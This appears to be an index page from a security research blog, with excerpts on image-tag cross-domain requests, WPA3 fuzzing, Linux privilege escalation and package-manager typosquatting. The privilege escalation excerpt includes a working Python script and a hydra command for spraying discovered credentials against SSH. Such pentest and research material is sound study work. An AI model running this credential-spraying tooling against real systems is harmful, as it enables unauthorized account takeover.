Abusing image tags for cross domain requests

Posted on December 15, 2020 in Security • Tagged with cross-domain-requests, cors, browser • 3 min read

Cross-domain requests made with <img> tags are not blocked by the same-origin policy: the browser issues them regardless of origin, and the policy only restricts what the page can read from the response. I will shed light on several ways a malicious website owner can potentially abuse cross-domain requests made with <img> and <script> tags created from JavaScript.


Continue reading

Model Based fuzzing of the WPA3 Dragonfly Handshake

Posted on October 19, 2019 in Security • Tagged with WPA3, Dragonfly, SAE, Fuzzing, libFuzzer, Greybox Fuzzing • 8 min read

The results of my Master thesis, named Model based fuzzing of the WPA3 Dragonfly handshake, are briefly discussed in this blog post. No severe vulnerabilities were discovered, mostly due to the limited deployment of WPA3 hardware since its introduction. However, a DoS vulnerability in iwd was found.


Continue reading

Fuzzing the WPA3 Dragonfly handshake

Posted on July 18, 2019 in Security • Tagged with wpa3, SAE, Dragonfly, fuzzing • 8 min read

Implementing possible fuzzing strategies with boofuzz against the WPA3 SAE (Dragonfly) handshake. Dragonfly is the authentication core of WPA3-certified routers and 802.11 devices.


Continue reading

Privilege Escalation Techniques

Posted on August 10, 2016 in Security • Tagged with Linux, Privilege Escalation, root • 3 min read

This blog post will serve as a cheatsheet for my future pentesting experiments and wargames, for when I am stuck and do not know how to proceed. I hope it will be of use to some people out there. This document will likely change and evolve in future revisions.

In this blog post I will discuss common privilege escalation techniques. I assume that an attacker has already gained a foothold on the server, for example by spawning a webshell through SQL injection or a similar web exploitation vector.

Helpful resources

Other people have published great information about the privilege escalation process.

  • https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List#credentials
  • https://github.com/PenturaLabs/Linux_Exploit_Suggester
  • http://www.rebootuser.com/?p=1623#.V64XaN_S30p
  • Script for common checks and detailed security report: LinEnum

Make use of discovered credentials

Often you can find login credentials for a custom admin web interface in the database. Because humans tend to reuse the same credentials across different services, it is always worth checking whether the discovered credentials also work on other services such as SSH or Telnet. If you can read /etc/passwd (it is world-readable on most systems), you can try all found credentials against all running services for every user account in the passwd file …
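As an added example (not code from the original post), the following script turns the idea above into a concrete credential-reuse test list: it parses passwd-style content, keeps only accounts whose shell permits an interactive login, and crosses them with the discovered credentials. The passwd lines and the "discovered" credentials are constructed sample data; the output format is the colon-separated login:pass list that hydra accepts with -C.

```python
"""Build a credential-reuse test list from discovered credentials and /etc/passwd.

Added example, not part of the original post. The passwd content and the
credentials below are constructed sample data, not taken from a real host.
"""
import itertools

# Constructed sample /etc/passwd content.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
mysql:x:112:119:MySQL Server,,,:/nonexistent:/bin/false
alice:x:1000:1000:Alice,,,:/home/alice:/bin/bash
bob:x:1001:1001::/home/bob:/bin/zsh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
"""

# Constructed credentials "found" in the web application's database.
DISCOVERED_CREDS = [("admin", "Summer2016!"), ("alice", "alice123")]

# Shells that never yield an interactive session; accounts using them are
# not worth spraying over SSH/Telnet.
NON_INTERACTIVE_SHELLS = {
    "/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
    "/usr/bin/false", "/bin/sync",
}


def parse_passwd(text):
    """Return (user, uid, shell) for every well-formed passwd line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # skip malformed lines instead of crashing mid-parse
        user, _pw, uid, _gid, _gecos, _home, shell = fields
        try:
            entries.append((user, int(uid), shell))
        except ValueError:
            continue  # non-numeric uid: malformed, skip
    return entries


def login_capable_users(text):
    """Users whose shell allows an interactive login (candidates for reuse tests)."""
    return [u for u, _uid, shell in parse_passwd(text)
            if shell not in NON_INTERACTIVE_SHELLS]


def spray_list(users, creds):
    """Cross every interactive user with every discovered password.

    Discovered (user, password) pairs whose username exists locally go first,
    since an identical account name is the most likely reuse case.
    """
    passwords = []
    for _user, pw in creds:
        if pw not in passwords:
            passwords.append(pw)
    pairs = []
    for user, pw in creds:
        if user in users and (user, pw) not in pairs:
            pairs.append((user, pw))
    for user, pw in itertools.product(users, passwords):
        if (user, pw) not in pairs:
            pairs.append((user, pw))
    return pairs


def hydra_format(pairs):
    """Render pairs as the colon-separated login:pass file hydra reads with -C."""
    return "".join(f"{u}:{p}\n" for u, p in pairs)


if __name__ == "__main__":
    users = login_capable_users(SAMPLE_PASSWD)
    print(hydra_format(spray_list(users, DISCOVERED_CREDS)), end="")
```

The resulting file can be fed to hydra (for example hydra -C creds.txt ssh://target), or to any other tool that takes user:password pairs; keeping the discovered pairing first means the most probable hit is tried before the lockout budget is spent on combinations.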


Continue reading

What other package managers are vulnerable to typo squatting attacks?

Posted on June 30, 2016 in Security • Tagged with security, Typosquatting, nuget, cargo • 6 min read

In my last blog post about typosquatting package managers I discussed my findings about attacking the programming language package managers from rubygems.org, PyPi and npmjs.com.

This blog post generated quite some interest, and readers subsequently asked whether other package managers might also be vulnerable to this hybrid attack (typosquatting combines a technical and a psychological attack vector). While writing my thesis, I encountered a number of other package managers. The GitHub showcase page about package managers gives a very good overview of the most popular ones; it is summarized in the table below:

Package manager (GitHub repository)    Stars on GitHub
bower/bower 14257
VundleVim/Vundle.vim 11969
npm/npm 9664
alcatraz/Alcatraz 8936
CocoaPods/CocoaPods 8115
composer/composer 7909
Carthage/Carthage 7160
jordansissel/fpm 6722
componentjs/component 4503
apple/swift-package-manager 4318
wbond/package_control 3018
pypa/pip 2911
chocolatey/chocolatey 2741
Masterminds/glide 2163
tmux-plugins/tpm 1961
Homebrew/brew 1757
rust-lang/cargo 1705
rubygems/rubygems 1547
caolan/jam 1540
volojs/volo 1326
gpmgo/gopm 1027
spmjs/spm 882
atom/apm 690
freshshell/fresh 674
ruslo/hunter 436
ocaml/opam 425
NuGet/Home 367

The obvious question now is: How many of those package managers …


Continue reading

Typosquatting programming language package managers

Posted on June 08, 2016 in Security • Tagged with PyPi, Npmjs.com, rubygems.org, security, Typosquatting • 10 min read

Edit: It seems that the blog post and the thesis caused quite some interest. Please contact me under the following mail address: admin [|[at]|] incolumitas [[|dot|]] com

In this blog post, it is demonstrated how

  • 17000 computers were forced to execute arbitrary code by typosquatting programming language packages/libraries
  • 50% of these installations were conducted with administrative rights
  • Even highly security aware institutions (.gov and .mil hosts) fell victim to this attack
  • a typosquatting attack becomes wormable by mining the command history data of hosts
  • some good defenses against typosquatting package managers might look like

The complete thesis can be downloaded as a PDF.

In the second half of 2015 and the early months of 2016, I worked on my bachelor's thesis. In this thesis, I tried to attack programming language package managers such as Python's PyPi, NodeJS's npmjs.com and Ruby's rubygems.org. The attack does not exploit a new technical vulnerability; rather, it tricks people into installing packages that they did not intend to run on their systems.

DNS Typosquatting

In the domain name system, typosquatting is a well-known problem. Typosquatting is the malicious registration of a domain that is lexically similar to another, often highly …


Continue reading